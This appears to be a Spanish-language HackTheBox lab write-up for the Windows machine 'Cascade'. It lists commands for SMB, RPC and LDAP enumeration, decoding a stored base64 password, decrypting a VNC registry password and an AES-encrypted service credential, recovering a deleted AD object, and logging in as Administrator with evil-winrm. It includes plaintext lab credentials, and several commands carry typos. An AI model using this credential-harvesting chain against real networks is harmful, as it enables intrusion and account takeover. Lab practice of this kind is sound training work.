Cascade

Cascade

Dec 15, 2021
HTB Windows

nmap -A -p- -oA mango 10.129.1.219 —min-rate=10000 —script=vuln —script-timeout=15 -v

nmap -sC -sV -O -p- -oA mango 10.129.1.219

nmap -sU -O -p- -oA mango-udp 10.129.1.219

nikto -h 10.129.1.219:80

ssh_command.

ssh_command.

echo “10.129.205.71 cascade.local” | sudo tee -a /etc/hosts

ssh_command.

rpcclient -U "" 10.129.205.71 -N

ssh_command.

rpcclient -U "" 10.129.205.71 -N -c “enumdomusers” | grep -oP ’[.*?]’ | grep -v “0x” | tr -d ’[]’

ssh_command.

sudo ./rpcenum -e DUsersInfo -i 10.129.205.71

ssh_command.

Se usa GetNPUsers si tienes usuarios pero no contrasenas Pero no encontramos nada

python3 /opt/impacket/examples/GetNPUsers.py cascade.local/ -no-pass -usersfile users

ssh_command.

Corremos lo siguiente con las herramientas de smbclient y smbmap

smbmap -H 10.129.205.71

smbclient -L 10.129.205.71 -N

ssh_command.

ldapsearch -x -h 10.129.205.71 -b “dc=cascade,dc=local” | grep “@cascade.local”

ssh_command.

ldapsearch -x -h 10.129.205.71 -b “dc=cascade,dc=local” | grep “@cascade.local” -A 20

ssh_command.

ssh_command.

echo “clk0bjVldmE=” | base64 -d; echo

ssh_command.

rpcclient -U "" 10.129.205.71 -N -c “queryuser r.thompson”

ssh_command.

crackmapexec smb 10.129.205.71 -u ‘r.thompson’ -p ‘rY4n5eva’

ssh_command.

Parece que no es un usuario que tenga acceso remoto

ssh_command.

smbmap -H 10.129.205.71 -u ‘r.thompson’ -p ‘rY4n5eva’

ssh_command.

smbclient //10.129.205.71/Data -U ‘r.thompson%rY4n5eva’

ssh_command.

Como tenemos varios directorios

sudo mkdir /mnt/smbmounted

ssh_command.

smb mount -t cifs //10.129.205.71/Data /mnt/smbmounted -o username=r.thompson,password=rY4n5eva,domain=cascade.local,rw

ssh_command.

Para no estar viendo y metiendonos en un directorio haciendo cd .. cd directorio etc

cd /mnt/submounted

tree

ssh_command.

cp /mnt/smbmounted/IT/Email\ Archives/Meeting Notes June 2018.html index.html

ssh_command.

Vemos lo que se encuentra en index.html El usuario

ssh_command.

pushd /mnt/smbmounted /mnt/smbmounted ~/Desktop/boxes/cascade/content

tree

ssh_command.

ssh_command.

cp /mnt/smbmounted/IT/Logs/Ark\ AD\Recycle\ Bin/ArkAdRecycleBin.log .

cat ArkAdRecycleBin.log

ssh_command.

Vemos el archivo VNC Install.reg

grep -i “Ark” users

ssh_command.

file VNC Install.reg

ssh_command.

ssh_command.

Para cambiarlo de hexadecimal a string

echo “6b,cf,2a,4b,6e,5a,ca,0f” | tr -d ’,’ | xxd -ps -r > password

ssh_command.

https://github.com/jeroennijhof/vncpwd

ssh_command.

./vncpwd ../password

ssh_command.

crackmapexec smb 10.129.205.71 -u ../users -p ‘sT333ve2’

ssh_command.

crackmapexec smb 10.129.205.71 -u ‘s.smith’ -p ‘sT333ve2’

ssh_command.

evil-winrm -i 10.129.205.71 -u ‘s.smith’ -p ‘sT333ve2’

ssh_command.

net user

net user s.smith

ssh_command.

smbmap -H 10.129.205.71 -u ‘s.smith’ -p ‘sT333ve2’

ssh_command.

cd C:\Shares\Audit

smbclient //10.129.205.71/Audit$ -U ‘s.smith%sT333ve2’

ssh_command.

download C:\Shares\Audit\CascAudit.exe

mv C:\Shares\Audit\CascAudit.exe ../CascAudit.exe

ssh_command.

Para bajar todos los archivos en smb

prompt off recurse on mget *

ssh_command.

ssh_command.

cd DB

file Audit.db

ssh_command.

sqlite3 Audit.db

.tables

select * from Ldap;

ssh_command.

echo “BQO5..” | base64 -d > arksvc_passwd

ssh_command.

Encontramos el ejecutable CascAudit.exe

ssh_command.

Lo (CascAudit.exe) abrimos con JetBrains dotPeek

ssh_command.

Lo (Crypto.dll) abrimos con JetBrains dotPeek

ssh_command.

Nos dirigimos a cyber chef. Introducimos la key y el vector IV

ssh_command.

credenciales-> arksvc:w3lc0meFr31nd

ssh_command.

evil-winrmm -t 10.129.205.71 -u ‘arksvc’ -p ‘w3lc0meFr31nd’

ssh_command.

whoami /priv

ssh_command.

Get-ADObject -Filter ‘Deleted -eq $true’ -IncludeDeletedObjects -Properties *

ssh_command.

echo “YmFDVDN..” | base64 -d

evil-winrmm -t 10.129.205.71 -u ‘Administrator’ -p ‘baCT3r1aN00dles’

ssh_command.